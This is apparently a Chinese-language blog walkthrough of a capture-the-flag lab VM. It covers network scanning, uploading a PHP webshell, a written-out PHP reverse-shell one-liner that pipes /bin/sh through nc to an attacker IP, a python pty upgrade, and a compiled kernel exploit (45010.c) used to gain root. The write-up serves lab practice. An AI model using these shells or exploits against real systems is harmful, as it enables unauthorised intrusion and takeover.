首先配置一下虚拟机,因为 ova 格式用 VM 导入的话,是不显示 ip 的,具体配置网上都有,这里就不说了

配置成功后,在本机上使用 arp-scan -l 就可以看到靶机 ip (用来验证是否配置成功)

image-20220706180938973

端口扫描

image-20220706173442839

开放了 80 端口,所以直接访问看看,点点点,就发现可疑接口

image-20220706173524813

写个一句话木马传上去,蚁剑连

image-20220706173618962

再 WordPress 下面发现配置文件

image-20220706173707830

在 /var/www/html 下有个.backup 文件

image-20220706173832888

然后尝试登录系统,但是并没有发现什么有用的东西,先写个反弹 shell 吧

image-20220706174421828

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.248.129 443 >/tmp/f");?>

image-20220706175349190

kali 本地监听 443 端口,浏览器访问刚才创建的反弹 shell 的文件 2.php
出现下图界面即为反弹成功

image-20220706175448414

升级 tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20220706175721981

查看一下内核版本

image-20220706175824793

在 kali 里找一下有没有该版本的漏洞信息,果然发现

image-20220706175910491

使用命令,把 .c 文件下下来,然后直接在本地 gcc 45010.c -o exp

image-20220706180048930

编译完成以后我们通过 ftp 服务上传到靶机中

image-20220706180304820

再回到靶机那边,给 exp 权限,最后提权成功

image-20220706180656881

进入 root 目录下,发现第二个 flag

image-20220706180751632

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

Dr34m 微信支付

微信支付

Dr34m 支付宝

支付宝

Dr34m 贝宝

贝宝